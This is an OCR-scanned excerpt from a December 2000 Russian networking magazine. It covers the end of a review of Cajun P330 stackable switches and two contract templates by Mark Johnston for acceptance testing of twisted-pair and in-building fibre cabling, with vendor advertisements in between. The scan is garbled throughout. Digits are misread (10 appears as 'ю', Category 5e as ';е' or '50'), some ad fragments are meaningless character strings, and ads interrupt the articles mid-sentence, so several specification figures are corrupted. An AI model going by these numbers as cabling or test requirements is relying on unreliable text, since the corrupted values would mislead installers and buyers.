достигает 8 Гбит/с, что в несколько раз
больше, чем у рассмотренных выше ар-
хитектур, и соответствует уровню мо-
дульных шасси. Столь высокая пропу-
скная способность шины в сочетании с
высокой производительностью отдель-
> http://www.lanmag.ru
Декабрь 2000 59
> КОРПОРАТИВНЫЕ СЕТИ: СТЕКОВЫЕ КОММУТАТОРЫ
кого устройства Р330 (составляющей
4 Гбит/с) позволяет эффективно
обеспечивать работу системы комму-
тации с большим числом скоростных
портов. Как показали испытания ла-
боратории Mier, пропускная способ-
ность на уровне теоретического мак-
симума для реалистичных конфигура-
ций обеспечивается как отдельным
устройством Cajun Р333Т, так и пол-
ным стеком из ю устройств. Даже в
конфигурации, когда весь ноток пере-
даваемых данных направляется меж-
ду разными элементами стека по ши-
не OctaPlane, пропускная способ-
ность достигает 9,6 Гбит/с, т. е. пре-
вышает паспортные значения.
Cajun Р330 обеспечивает поддерж-
ку всех необходимых для стековой
системы функциональных возможно-
стей. Несколько устройств или сте-
ков могут быть связаны между собой
как одиночными, так и транковыми
каналами (Link Aggregation Group,
LAG), в которые могут быть объеди-
нены до восьми медных портов или
до двух оптических портов Fast
Ethernet либо Gigabit Ethernet. Все-
го в стеке есть возможность опреде-
лить до 50 групп портов, объединен-
ных в группы LAG. Сетевой трафик
может отображаться с заданного пор-
та или всех портов, входящих в задан-
ную VLAN, на порт, к которому под-
ключено анализирующее устройство
(в том числе с возможностью выделе-
ния только входящего трафика). Лю-
бые комбинации портов в стеке могут
быть объединены в одну из 3071 под-
держиваемых VLAN. Для маршрути-
зации потоков данных между VLAN
или подсетями в стеке достаточно од-
ного устройства Cajun P333R. При со-
единении в стек десять таких уст-
ройств создают маршрутизирующий
коммутатор с производительностью
до ю млн пакетов/с. Этот показатель
также соответствует уровню мощных
модульных шасси при гораздо мень-
шей стоимости.
Естественно, в новых устройствах
Avaya поддерживается упоминав-
шийся ранее протокол мониторинга
коммутируемых систем SMON. Более
того, для мониторинга функций мар-
шрутизации в Cajun P333R включена
поддержка новой версии протокола —
AnyLayer SMON. Она позволяет от-
слеживать распределение коммути-
руемых потоков данных по протоко-
лам сетевого и прикладного уровня и
предоставляет другие, весьма полез-
ные для сетевых администраторов,
возможности.
Отдельного внимания заслужива-
ют средства обеспечения надежности
системы. Кроме отказоустойчивой ар-
хитектуры стековых соединений про-
изводителем реализована возмож-
ность отключения и замены любого
элемента стека без прерывания работы
или реконфигурации стека в целом.
Имеющийся у каждого элемента стека
встроенный агент управления автома-
тически осуществляет копирование
конфигурации между ними. Смена
главного элемента также осуществля-
ется без вмешательства администрато-
ра и не требует прерывания передачи
данных в стеке.
Надежность связей между отдель-
ными устройствами и стеками обеспе-
чивается резервированием между за-
данными портами, вне зависимости от
их положения в стеке (до 20 резервиру-
емых пар на стек). 1 [римснсиис транко-
вых групп LAG также является формой
резервирования, причем с распределе-
нием нагрузки между каналами. Более
того, резервирование возможно и меж-
ду транковыми группами LAG. На се-
тевом уровне использование в Cajun
P333R протоколов OSPF и VRRP поз-
воляет определить несколько возмож-
ных путей маршрутизации пакетов с
автоматическим переключением на ре-
зервный маршрут.
На физическом уровне для обеспе-
чения надежности каждого устройства
применяются резервные блоки пита-
ния и резервирование вентиляторов с
датчиками отказа. Все устройства дос-
тупны в специальном варианте с пита-
нием от батареи постоянного тока на
48 В. В целом, система обеспечения
надежности в Cajun Р330 соответству-
ет стандарту Telcordia Network
Equipment Building System (NEBS) в
самой строгой его редакции Level 3
для устройств в магистральной части
телекоммуникационных служб. В на-
стоящее время система Cajun Р330
проходит сертификацию на соответст-
вие этому стандарту.
Таким образом, семейство коммута-
торов Lucent Cajun Р330 позволяет эф-
фективно решать задачи передачи дан-
ных самого широкого диапазона: созда-
вать как небольшие рабочие группы на
три-четыре десятка рабочих мест, так и
насыщенные высокопроизводительные
узлы коммутации в сотни портов; как
центры распределенных систем с опти-
ческой магистралью, так и серверные
группы в многосвязной маршрутизиру-
емой среде.
ПОСЛЕСЛОВИЕ
Естественно, в рамках одной статьи
сложно дать детальное описание даже
основных, представленных на рынке
решений. За рамками публикации ос-
тались многие интересные вопросы, на-
прямую не относящиеся к достоинст-
вам или недостаткам конкретной схе-
мы стековой архитектуры.
Кроме того, мы сознательно не про-
водили прямого сравнения. Благодаря
конкуренции цены на описанные выше
продукты в большинстве случаев сопо-
ставимы между собой, и их стоимость
колеблется на уровне юо долларов за
коммутируемый порт Fast Ethernet для
витой пары. Однако стоимость продук-
та в значительной степени зависит от
условий конкретной поставки.
Вывод напрашивается сам собой.
Наращиваемые стековые коммутато-
ры представляют разумную альтерна-
тиву как автономным устройствам
фиксированной конфигурации, зна-
чительно превосходя последние по
функциональности и масштабируе-
мости, так и модульным коммутато-
рам па основе шасси, позволяя ре-
шать те же задачи при намного мень-
ших затратах.
В нашей стране, где наблюдается
быстрый рост информационных сис-
тем зачастую при ограниченных сред-
ствах, данной разновидности уст-
ройств гарантировано широкое рас-
пространение. Надеемся, что этот об-
зор предоставил необходимую инфор-
мацию, позволяющую принять верное
решение. Каждая из рассмотренных
систем отвечает определенному набо-
ру требований. Так что окончательный
выбор за вами! LAN
Александр Гусак — начальник управле-
ния системной интеграции компании
«Эврика». С ним можно связаться по
адресу: a_gusak@eureca.ru.
60 LAN/Журнал сетевых решений
КАБЕЛЬНЫЕ СИСТЕМЫ:
Контракт
на тестирование СКС
Требования по обследованию,
тестированию и приемочному контролю
структурированных кабельных систем
Марк Джонстон
> tft&Z S^F-l'LVAse^
> ^ZAp^Tl^^-
> FilaA
> &TAMP&
> LAW/'? &-?*/
N&v RAI^
? 13й^ Ря?р Fzr-P |MAX
у &iL- A Ггл//О
V&Y Ft^M J5£TH
Слишком часто проект становится
жертвой ужасных слов — «предпо-
ложим» или «допустим». Допуще-
ния ведут к нарушению взаимодейст-
вия, взаимному непониманию и, в кон-
це концов, к еще одному столь же ужас-
ному слову — «провал». Однако чтобы
подготовить документ с тестовыми спе-
цификациями для всех заданий на ра-
боту, требуется совсем немного време-
ни и усилий. Если его тщательно проду-
мать, то такой документ в случае обна-
ружения расхождений послужит хоро-
шей защитой как для владельца здания
(далее Заказчика), так и для исполните-
ля работ (далее Подрядчика); он дол-
жен содержать детали, относящиеся к
целям спецификации, и определять, что
приемлемо, а что — нет. Конечно, по-
добный шаг потребует дополнительных
затрат, но результат того стоит.
В данном документе детально изла-
гаются требования по обследованию,
тестированию и приемочному контро-
лю структурированных кабельных сис-
тем внутри зданий. Его назначение —
дать возможность Заказчику получить
от Подрядчика обоснованные предло-
жения при разработке новых рабочих
проектов: впоследствии это позволит
гарантировать, что выполненная рабо-
та будет соответствовать принятым се-
годня стандартам качества, производи-
тельности и документирования.
ПРЕДУСТАНОВОЧНОЕ
ИНСПЕКТИРОВАНИЕ
1. Визуально проверить все кабели, ка-
бельные катушки и упаковочные ко-
робки, с целью выявления возмож-
ных повреждений кабеля во время
погрузки и транспортировки. Кабе-
ли с видимыми повреждениями под-
лежат возврату поставщику и замене
без дополнительных затрат со сторо-
ны Заказчика.
2. Если производителем кабеля или
коммутационного оборудования бы-
ли представлены данные об их рабо-
чих характеристиках после изготов-
ления, то они должны быть сохране-
ны для включения в документацию и
предоставления Заказчику по его
просьбе.
© Cabling Business Magazine.
> http://www.lanmag.ru
Декабрь 2000 63
> КАБЕЛЬНЫЕ СИСТЕМЫ:
3. Все материалы должны быть новы-
ми и не иметь дефектов.
ТЕСТИРОВАНИЕ И СЕРТИФИКАЦИЯ
ПОСЛЕ УСТАНОВКИ
1. Требования к Подрядчику
а) Подрядчик должен обеспечить ква-
лифицированных специалистов для
завершения тестирования в течение
установленного по соглашению пери-
ода. В договоре следует указать точ-
ную дату начала и окончания работ.
Ь) Подрядчик должен обладать как
минимум трехлетним опытом инстал-
ляции и тестирования структуриро-
ванных кабельных систем. Все выде-
ленные Подрядчиком для работы
монтажники должны иметь сертифи-
каты, удостоверяющие их квалифика-
цию на проведение монтажа и тести-
рование поставленных продуктов.
с) Подрядчик обязан предоставить все
оборудование, необходимое для про-
ведения приемочного тестирования.
d) Подрядчик несет ответствен-
ность за предоставление приемоч-
ной документации, как определено
в Разделе 4.
2. Процесс тестирования
а) Владелец оставляет .за собой право
присутствовать при проведении лю-
бой или всех процедур тестирования.
Ь) Тестированию подлежит конфи-
гурация Basic Link. Однако Под-
рядчик должен гарантировать со-
блюдение рабочих параметров для
конфигурации Channel и предоста-
вить коммутационные шнуры с со-
ответствующими рабочими характе-
ристиками.
с) Все элементы кабельной системы,
не протестированные в строгом соот-
ветствии с данными процедурами,
должны быть подвергнуты повторно-
му тестированию без дополнитель-
ных расходов со стороны Заказчика.
d) Тестированию подлежит вся без
исключения проводка инсталлиро-
ванной кабельной системы. Все тес-
ты должны соответствовать прие-
мочным критериям, как определено
в Разделе 3.
3. Соответствие стандартам и тестовые
требования
а ) Кабельная система должна удов-
летворять следующим специфика-
циям:
• TIA 568А и TIA TSB67 по Катего-
рии 3;
• TIA 568А-А5 по Категории ;е (или
Т1А 568В по Категории ^е, когда
применимо);
• TIA 568А по Категории 6, «Допол-
нения» (проект 5 или более поздний).
Ь) Все используемое тестовое обору-
дование должно отвечать техниче-
ским требованиям, как определено в
Разделе 5.
4. Документация
а) Отчеты о тестировании должны
предоставляться в виде распечатки
или в электронной форме; отчеты, на-
писанные от руки, нс принимаются.
Ь) Отчеты в виде распечатки должны
предоставляться с приложенным
письменным подтверждением, удо-
стоверяющим прохождение всех те-
стов. Для больших инсталляций
64 LAN/Журнал сетевых решений
> КАБЕЛЬНЫЕ СИСТЕМЫ:
предпочтительными являются отче-
ты в электронной форме с итоговой
распечаткой. Итоговая распечатка
должна содержать следующую ин-
формацию в каждой строке отчета:
идентификатор (ID) линии, специ-
фикации используемого теста, дли-
на, дата проведения теста, результат
по критерию «прошел/не прошел»,
с) Электронные отчеты представля-
ются на дискете 3,5" или на компакт-
диске. При использовании нестан-
дартного программного обеспечения
дискета или компакт-диск должны
содержать все программы, необходи-
мые для просмотра результатов тес-
тирования. Если результаты выдают-
ся в стандартных форматах — файлы
Excel, Access, CSV и т. д., программ-
ные средства для считывания файлов
прилагать не требуется. Электронные
отчеты должны сопровождаться Сер-
тификатом, подписанным уполномо-
ченным представителем Подрядчика
и гарантирующим истинность и точ-
ность электронного отчета. В Серти-
фикате должны быть указаны отсле-
живаемые номера линий, соответст-
вующие электронному отчету.
d) Отчеты должны включать в себя
следующую информацию по каждо-
му протестированному элементу ка-
бельной системы.
i) Результаты по схеме разводки, де-
монстрирующие, что кабельная си-
стема не имеет коротких замыка-
ний, открытых концов, отсутствую-
щих проводников, разбитых, ревер-
сированных пар или перекрещен-
ных проводников и что связность
соблюдается от точки к точке.
П) Для кабельных систем Катего-
рии 3: затухание и данные по NEXT
для худшего случая, значение час-
тоты при этом событии, предельное
значение в данной точке и разброс.
Такие тесты следует выполнять на
частотах от 1 до 16 МГц. Информа-
ция должна предоставляться по
всем парам или комбинациям пар в
обоих направлениях. Любой инди-
видуальный тест, не отвечающий
соответствующим техническим ус-
ловиям, должен быть обозначен
как «не прошел».
iii) Для кабельных систем Катего-
рии je или 6: данные по затуханию,
NEXT, PSNEXT, возвратным по-
slfHl
W 9
в режиме реального времени
Е Инвентаризация
любых ресурсов Вашей сети
Е Интеграция
с оборудованием ЛВС
I Высочайшее качество продукции
I Выгодные условия партнерства
I Собственный учебный центр
ЦПроектная, маркетинговая
и техническая поддержка
К Все оборудование
сертифицировано в РФ
(095) 258-3801
(095)437-8613
(812) 325-2973
(095)444-2101
(095)967-6657
(3272)50-8080
(044) 276-5195
(095)461-4381
Кабельная снеге?
полностью удовл!
требованиям про/
стандарта Катего(
АВТОРИЗОВАННЫЕ
ДИСТРИБЬЮТОРЫ
Анкей
Информсвязь
Катарсис
Ландата
Ланит
ABS
IV Trading
Stins Corp.
Уникальная система
интерактивного управления
информационными
ресурсами
Making NeTuio'iki £мал[цп
Представительство RiT в СНГ:
103045 Москва, Даев пер., 20, оф.415, тел.: (095) 204-8005,204-8227, 204-8153, mkt@rit.ru, http://www.rit.ru
Интеллект. Который ТвоРИТ
Информационна» система СОВСРШвНСТВО
это сложный организм, который,
адаптируясь к Вашим потребностям,
должен быть способен выполнить
любую Вашу задачу w.
> http://www.lanmag.ru
Декабрь 2000 65
> КАБЕЛЬНЫЕ СИСТЕМЫ:
ЗАКАЖИТЕ СВОЙ БЕСПЛАТНЫЙ ЭКЗЕМПЛЯР
терям, ELFEXT и PSELFEXT,
SELFEXT в наихудшем случае с
указанием значения частоты, при
которой данное событие имело мес-
то, а также предельного значения в
данной точке и разброса. Тесты сле-
дует выполнять на частоте от 1 МГц
до самой высокой соответствующей
частоты с шагом, отвечающим тре-
бованиям TIA и ISO. Информация
должна предоставляться по всем па-
рам или комбинациям пар в обоих
направлениях, если так задано соот-
ветствующими стандартами. Любой
индивидуальный тест, не отвечаю-
щий техническим условиям, должен
быть обозначен как «не прошел».
iv) Длина (в метрах), задержка на
распространение сигнала и расфа-
зировка задержки относительно со-
ответствующего предельного значе-
ния. Любой индивидуальный тест,
не отвечающий техническим усло-
виям (спецификациям), должен
быть обозначен как «не прошел».
v) Изготовитель кабеля, по-
мср/тип компонентов кабеля,
NVP (номинальная скорость рас-
пространения сигнала).
vi) Изготовитель тестера, модель,
серийный номер, версии программ-
ного и аппаратного обеспечения.
vii) Идентификационный (ID) но-
мер линии и название проекта.
viii) Спецификация использован-
ного автоматического теста.
ix) Итоговые показания по крите-
рию «прошел/не прошел».
х) Дата тестирования.
е) Тестовые отчеты подаются не
позднее, чем через семь рабочих дней
со дня завершения тестирования.
5. Тестовое оборудование
а) По условиям данного контракта
используемое тестовое оборудова-
ние должно быть выпущено произ-
водителем с опытом изготовления
полевых тестовых приборов не ме-
нее пяти лет. Изготовители должны
иметь сертификат ISO 9001.
b) Весь тестовый инструментарий
данного типа должны быть от одного
производителя и иметь совмести-
мые средства вывода электронных
результатов.
с) Кабели для тестового оборудова-
ния должны быть одобрены изгото-
вителем тестового оборудования.
Применение адаптеров из других ис-
точников не допускается.
d) Базовая точность измерений тес-
тового оборудования должна превы-
шать TIA Level III, что должно под-
тверждаться данными независимой
лаборатории.
е) Тестовое оборудование должно
быть в состоянии сертифицировать
линии по Категории 5, 50 и 6.
() Для минимизации погрешностей
измерения тестовое оборудование
должно иметь динамический диапа-
зон не менее юо дБ.
д) Тестовое оборудование должно
иметь возможность хранить в памя-
ти данные по всем частотам для всех
тестов, а также все цветные графиче-
ские отчеты/распечатки.
h) Для точного и эффективного уст-
ранения неисправностей тестовое
оборудование должно поддерживать
возможность диагностики по време-
ни в S-полосе для помех NEXT и воз-
вратных потерь (TDNXT и TDRL).
i) Тестовое оборудование должно
быть в состоянии выполнить инди-
видуальные измерения NEXT, воз-
вратных потерь и т. д. в дополнение
к автоматнчесим тестам. Индивиду-
альные тесты повышают эффектив-
ность диагностики отказов.
j) Тестовое оборудование должно
включать библиотеку типов кабеля,
упорядоченную по основным произ-
водителям.
к) Тестовое оборудование должно
хранить во внутренней памяти не
менее юоо автоматических тестов
для Категории je или 6.
I) Тестовое оборудование должно
иметь внутренние возможности для
группировки автоматических тестов
и кабелей в папках проектов для эф-
фективного управления записями.
ш) Тестовое оборудование должно
включать в себя технологию DSP для
поддержки расширенных измерений,
п) Тестовое оборудование должно
быть в состоянии выполнить изме-
рения па всех частотах в соответст-
вии со стандартами TIA.
о) Плоскость отсчета тестового обору-
дования должна начинаться сразу на
выходе интерфейсного разъема тесто-
вого оборудования. Наличие мертвой
зоны, исключающей какую-либо часть
линии из измерений, недопустимо.
ПРИЕМКА
1. Приемка
По завершении всех работ предоста-
влении тестовой документации За-
казчик должен подтвердить, что ра-
бота выполнена в соответствии с
контрактом, и в письменной форме
уведомить Подрядчика о формаль-
ной приемке системы.
66 LAN/Журнал сетевых решений
> КАБЕЛЬНЫЕ СИСТЕМЫ:
2. Приемочные требования
а) Подрядчик должен дать письмен-
ную гарантию того, что инсталляция
на юо% соответствует требованиям,
указанным в разделе «Соответствие
стандартам и тестовые требования».
Ь) Заказчик оставляет за собой право
выполнить повторное произвольное
тестирование до 5% кабельной уста-
новки, используя оборудование и
рабочую силу Подрядчика с целью
проверки документированных ре-
зультатов. Повторное произвольное
тестирование, если оно производит-
ся, выполняется за счет Заказчика
по стандартным расценкам на по-
добные работы. Любая не функцио-
нирующая часть кабельной провод-
ки, подлежит повторному тестиро-
ванию и приведению в рабочее со-
стояние. Если повторным тестиро-
ванием установлено несоответствие
требованиям более 2% кабельной си-
стемы, то вся кабельная система тес-
тируется повторно и приводится в
рабочее состояние без дополни тель-
ных затрат со стороны Заказчика.
с) Проектировщик/консультанты и
Заказчик могут, по договоренности,
разрешить отклонение от стандарти-
зованного критерия (например, пре-
вышение длины) на конкретных
участках кабельной системы. В та-
ком случае эти участки четко иден-
тифицируются и исключаются из
требований на прохождение стан-
дартных тестов.
d) Приемка должна происходить по
завершении всей работы, успешно-
го тестирования после инсталляции
(т. е. результатом всех тестов долж-
на быть оценка «прошел») и полу-
чения всей документации, как ука-
зано в Разделе 4.
3. Гарантии
Подрядчик должен дать гарантии на
период в 1 год, ю или 15 лет на отсут-
ствие дефектов продукции, а также
удостоверить, что все одобренные
компоненты кабельной системы со-
ответствуют или превышают требо-
вания TIA/EIA 568А, TIA/EIA
568А-А5 и ISO/IEC 11801. LAN
Марк Джонстон — директор отдела по
технологическому развитию компании
Microtest. С ним можно связаться через
его сайт http://www.cabling.com.
Electronics
NETCONNECT
• Экранированные и неэкранированные СКС Cat. 5Е, Cat. 6
• Система AMP Communications Outlet: двукратное расширение сети без
дополнительных кабелей
• Полное решение на основе нового оптического соединителя MT-RJ
• «Бесклеевые» волоконно-оптические технологии LightCrimp & Corelink
• 25-летняя гарантия от Tyco Electronics AMP
• Обучение в московском учебном центре и в регионах
Дистрибуторы:
LANHOST (Москва):
тел.: (095) 286-4105,
(095) 286-5405
http://www.lh.ru
MARVEL (Москва/ С.-Петербург).
тел.: (095) 745-8008,
(812) 326-3232
http://www.marvel.ru
OCS (Москва/ С.-Петербург):
тел.: (095) 737-6030,
(812) 324-2870
http://www.ocs.ru
TERRANET (Москва):
тел.: (095) 943-7783,
(095) 943-7784
http://www.terranet.ru
Структурированные
кабельные системы АМР
Представительства
в России
Москва
тел.: (095) 926-5509/08,
факс: (095) 926-5505
С.-Петербург: тел.: (812) 325-3083,
факс: (812) 325-3288
http://www.ampnetconnect.com
http://www.ampnetconnect.ru
> http://wwvi.lanmag.ru
Декабрь 2000 67
> КАБЕЛЬНЫЕ СИСТЕМЫ: ТЕСТИРОВАНИЕ ОПТИЧЕСКОЙ ПРОВОДКИ
Контракт
на тестирование
оптической системы
Требования по обследованию,
тестированию и приемочному контролю
волоконно-оптических кабельных
систем внутри зданий, маркджонстон
В предыдущей статье мы перечисли-
ли технические требования, предъ-
являемые к тестированию структу-
рированных кабельных систем здания.
Ниже мы представляем аналогичный
документ, касающийся волоконно-опти-
ческих кабельных систем внутри зданий.
ПРЕДУСТАНОВОЧНОЕ
ИНСПЕКТИРОВАНИЕ
1. Визуально проверить все кабели, ка-
тушки с кабелем и упаковочные ко-
робки для выявления возможных по-
вреждений кабеля во время погрузки
и транспортировки. Кабели с видимы
ми повреждениями подлежат возвра-
ту поставщику и замене без дополни-
тельных затрат со стороны Заказчика.
2. Если производителем кабеля или ком
мутационного оборудования после из-
готовления были представлены дан-
ные об их рабочих характеристиках, то
они должны быть сохранены для
включения в документацию и предос-
тавления Заказчику по его просьбе.
3. Все материалы должны быт ь новы-
ми и нс имет ь дефектов.
ТЕСТИРОВАНИЕ И СЕРТИФИКАЦИЯ
ПОСЛЕ УСТАНОВКИ
1. Требования к Подрядчику
а) Подрядчик должен обеспечить
квалифицированных специалистов
для завершения тестирования в те-
чение установленного по соглаше-
нию периода. В договоре следует
указать точную дату начала и окон-
чания работ.
Ь) Подрядчик должен обладать как
минимум трехлетним опытом ин-
сталляции н тестирования волокон-
но-оптических кабельных систем.
Все выделенные Подрядчиком для
работы монтажники должны иметь
сертификаты, удостоверяющие их
квалификацию на проведение ин-
сталляции волоконно-оптических
кабельных систем.
с) Подрядчик обязан предоставить все
оборудование, необходимое для про-
ведения приемочного тестирования.
d) Подрядчик несет ответственность
за предоставление приемочной доку-
ментации, как определено в Разделе 4.
© Cabling Business Magazine.
> http://www.lanmag.ru
Декабрь 2000 69
> КАБЕЛЬНЫЕ СИСТЕМЫ:
2. Процесс тестирования
а) Владелец оставляет за собой право
присутствовать при проведении лю-
бой или всех процедур тестирования.
Ь) Тестированию подлежит воло-
конно-оптическая линия. Линия оп-
ределяется как пассивная кабельная
проводка между двумя оптически-
ми кроссами (коммутационными
панелями или розетками). К линии
относятся кабель, разъемы и сращи-
вания (постоянные соединения во-
локон без использования коннекто-
ра) и не относятся активные компо-
ненты системы. Тестирование ли-
нии проводится на характерные по-
тери в разъемах на коммутационной
панели, связанные с сопряжением
коммутационных шнуров, но не рас-
пространяется на рабочие характе-
ристики разъема на интерфейсе
оборудования.
Вй км ст|укту||||нтх
пйш сига капгорИ 7,8,5®
fcil ‘ У****.^
Кабель
Розетки и модули
Коммутационные блоки
Коммутационные панели
Шнуры и разъемы
Сещйки, шкафы и рамы
Монтажные инструменты
и кабельные тестеры
экранированная
и неэкранированная
"витая пара"
оптоволоконный
многопользовательские МиТОА
экономичные МАХ-серии
престижные СТ-серии
настенные SM-серии
оптоволоконные MT-RJ, LC, SC и ST
серий S11O, S210 настенного
и стоечного исполнения
коммутационные блоки 66 типа
устройства первичной
и вторичной защиты
настенного и стоечного исполнения
модульные с высокой
плотностью портов
универсальные наборные
экранированные
оптоволоконные MT-RJ, LC, SC и ST
8, и 6-позиционные
1-, 2-, 3- и 4-парные
коммутационных блоков
серий S11O и S 210
25-парные TELCO
оптоволоконные
распределительные шкафы
19-дюймовые
распределители кабеля
настенные рамы для
коммутационных блоков 66 типа
КомпанияICS
Дистрибьютор
The Siemon Company
в Санкт-Петербурге
195112, Санкт-Петербург,
пр.Шаумяна 18, офис 303
телефоны:
(812) 528-9657,
(812) 528-9667,
(812) 324-3366.
“Madex Ltd."
П’л*‘<й спет
опг11Р"Р1“>^и
СНСГем сгаД '
МГ.о/ Яар'а
HJhLc
Дистрибьютор
The Siemon Company
в Москве
107082 Россия, Москва,
ул. Ф. Энгельса 67
телефоны:
(095) 755 68 19,
(095) 720 49 00.
факс:
(095) 913 99 87.
http://www.intelbuild.ru, E-mail: ics@intelbuild.ru http://www.madex.spb.ru, E-mail: madex@siemon.ru
с) Все элементы кабельной системы,
нс протестированные в строгом соот-
ветствии с данными процедурами,
должны быть подвергнуты повторно-
му тестированию без дополнитель-
ных расходов со стороны Заказчика.
d) Тестированию подлежит вся без
исключения инсталлированная ка-
бельная система. Все тесты должны
соответствовать приемочному кри-
терию, как определено в Разделе 3.
3. Соответствие стандартам и тестовые
требования
а) Если не оговорено иное, многомодо-
вый и одномодовый волоконно-оптиче-
ский кабель должен удовлетворять спе-
цификациям на рабочие параметры,
указанным в стандарте ANSI/TIA/EIA
568-В.3. Многомодовое волокно долж-
но иметь размеры сердцевины/«обо-
лочки» 50/125 микрон или 62,5/125 мик-
рон. Одномодовое волокно должно
быть с несмещенной дисперсией по
требованиям Класса IVa.
b) Тестирование инсталлированного
многомодового волоконно-оптиче-
ского кабеля.
I) Затухание в линии должно прове-
ряться в соответствии с требовани-
ями ANSI/TIA/EIA 526-14-А. Эта-
лонные измерения выполняются в
соответствии с методикой В или
аналогичной ей. Оптические поте-
ри измеряются для каждого волок-
на на длинах волн 850 нм и 1300 им.
Потери должны оцениваться в каж-
дом направлении (двунаправлен-
но), если только изначально не бы-
ло известно, какие волокна будут
выполнять функции передачи (Тх),
а какие — приема (Rx).
ii) Длина линии должна быть изме-
рена оптически или вычислена с
помощью меток длины на оболоч-
ке кабеля.
iii) Кабельная система должна отве-
чать требованиям по потерям и
длине как для горизонтальных, так
и для магистральных линий, в зави-
симости от приложения. Горизон-
тальная кабельная система — это
кабель, проложенный между теле-
ком му ника! 1ион ной розсткой/гнез-
дом (включая последнее) и гори-
зонтальным кроссом. Максималь-
ная длина горизонтальных линий —
90 м. Магистральная кабельная си-
стема — это кабель между телеком-
70 LAN/Журнал сетевых решений
> КАБЕЛЬНЫЕ СИСТЕМЫ:
муникационными шкафами, уст-
ройствами городского ввода и аппа-
ратными залами в пределах здания
или между зданиями. В магистраль
входят коннекторы на кроссе и сра-
щивания (если они есть).
iv) Критерии для горизонтальной
линии:
затухание: <2 дБ при 850 им и
1300 нм;
длина: <90 м.
v) Критерии для магистральной
линии:
затухание при 850 нм:
<длина волокна (км) х 3,75 дБ/км
+ число коннекторных пар х 0,75
дБ + число сращиваний х 0,3 дБ;
затухание при 1300 нм:
<длина волокна (км) х 1,5 дБ/км +
число коннекторных пар х 0,75 дБ
+ число сращиваний х 0,3 дБ;
длина: <2000 м.
с) Тестирование инсталлированного
одномодового волокна.
i) Затухание в линии должно тести-
роваться в соответствии с докумен-
Длина | <90 м 91-1000 м 1001-2000 м 2001-5000 м
Затухание на 1310 нм <2,0 дБ <3,0 дБ <3,3 дБ <4,7 дБ
Таблица 1.
том ANSI/T1A/EIA 526-7 по методу
А. Контрольные измерения выпол-
няются в соответствии с методикой
Ал или аналогичной ей. Оптиче-
ские потерн измеряются для каждо-
го волокна при длине волны 1310
нм. Потери должны оцениваться по
каждому направлению (двунаправ-
ленно), если только изначально не
было известно, какие волокна будут
выполнять функцию передачи
(Тх), а какие - приема (Rx).
ii) Длина линии должна быть измере-
на оптически или вычислена с помо-
щью меток длины на оболочке кабеля,
iii) Кабельная система должна отве-
чать требованиям но потерям и
длине. Одномодовое волокно обыч-
но используется в магистральной
кабельной системе между телеком-
муникационными шкафами, уст-
ройствами городского ввода и аппа-
ратными залами в пределах здания
или между зданиями. В магистраль
входят коннекторы на кроссе и сра-
щивания (если они есть).
iv) Критерии линии (см. Таблицу 1).
d) Все используемое тестовое обору-
дование должно отвечать требовани-
ям спецификаций, как определено в
Разделе 5 (ниже).
4. Документация
а) Отчеты о тестировании должны
предоставляться в виде распечатки
и/или в электронном формате; отчеты,
написанные от руки, не принимаются.
//Российская Академия Интернет
Национальная Интел |(iyTEРНЕТ ПРЕМИЯ
Российская Академия Интернета-i tllllllf /________
телекомпания РТР и корпорация Intel® представляют
У Вас есть любимые отечественные сайты?
Выдвигайте их на престижную общенациональную премию
Это право имеет любой человек, вошедший в Интернет.
Представьте в Интернете свой любимый сайт!
> http://wwvdanmag.rii
Декабрь 2000 71
> КАБЕЛЬНЫЕ СИСТЕМЫ:
АНИЕ ОПТИЧЕСКОЙ ПРОВОДКИ
КАБЕЛЬНЫЕ
СИСТЕМЫ
Тел.: (095) 956 3404
(многоканальный)
Ь) Отчеты в виде распечатки должны
предоставляться с приложенным
письменным подтверждением, удосто-
веряющим прохождение всех тестов.
с) Электронные отчеты представля-
ются на дискете 3.5" или па компакт-
диске. Дискета или компакт-диск
должны содержать все программы,
необходимые для просмотра резуль-
татов тест ирования. Электронные от-
четы должны сопровождаться Серти-
фикатом, подписанным уполномо-
ченным представителем Подрядчика
и гарантирующим истинность и точ-
ность электронного отчета. В Серти-
фикате должны быть указаны отсле-
живаемые номера линий, соответст-
вующие электронному отчету.
d) Отчеты должны включать в себя
следующую информацию по каждо-
му протестированному элементу ка-
бельной системы.
i) Фактически измеренное и макси-
мально допустимое значение зату-
хания (потери) на заданной длине
волны (в соответствии с Разделом
3) и разброс. Индивидуальный тест,
результаты которого не соответст-
вуют требованиям к липни, должен
быть помечен как «не прошел».
ii) Эталонный метод измерений.
iii) Число стыкующихся коннекто-
ров и число сращиваний (если
они есть).
Более подробная £
информация
по тел./факс
(095)9^-^707
или на следующих
Web-сайтах
www.panduit.ru или
www.oanduit.com/ncg
I Больше, чем просто СКС
4
iv) Фактическая длина и макси-
мально допустимая длина по Раз-
делу 3. Любой индивидуальный
тест, результаты которого не отве-
чают предъявленным критериям к
длине линии, должен быть поме-
чен как «не прошел».
v) Групповой коэффициент прело-
мления (GRI) для типа тестируе-
мого волокна, если длина измеря-
лась оптически.
vi) Изготовитель тестера, модель,
серийный номер, версии програм-
ного и аппаратного обеспечения.
vii) Идентификационный номер ID
канала и название проекта/работы,
viii) Использованный критерий
для линии (автоматический тест).
ix) Итоговые показания теста по
критерию «прошел/не прошел».
х) Дата и время тестирования.
е) Тестовые отчеты подаются в пери-
од нс позднее семи рабочих дней со
дня завершения тестирования.
5. Тестовое оборудование
а) По условиям контракта использу-
емое тестовое оборудование должно
быть выпущено производителем с
опытом производства полевых тес-
товых приборов не менее пяти лет.
Изготовители должны иметь серти-
фикат ISO 9001.
b) Все тестовые инструменты данно-
го типа должны быть от одного про-
изводителя и иметь совместимые
средства вывода электронных ре-
зультатов.
с) Тестовое оборудование должно
быть в состоянии выполнить изме-
рения относительной или абсолют-
ной оптической мощности в соответ-
ствии с TIA/EIA 526-14А и TIA/EIA
526-7, метод А.
d) Тестовое оборудование не должно
включать в измерения кабельной си-
стемы потери и длину тестовых пе-
ремычек.
е) Многомодовое тестовое оборудо-
вание должно объединять в одном
блоке оба источника — 850 нм и 1300
нм. Спаренная выходная мощность в
многомодовое волокно должна быть
20 дБм па каждой длине волны. Ди-
намический диапазон детекторов не
менее чем от +3ДБ до -55 дБ.
f) Чтобы предотвратить связанные с
настройкой ошибки, длина волны
должна автоматически синхропизи-
72 LAN/Журнал сетевых решений
> КАБЕЛЬНЫЕ СИСТЕМЫ: ТЕСТИРОВАНИЕ ОПТИЧЕСКОЙ ПРОВОДКИ
роваться источниками и измери-
тельными приборами.
д) Тестовое оборудование должно
хранить во внутренней памяти ре-
зультаты нс менее юо тестов.
h) Для облегчения загрузки храня-
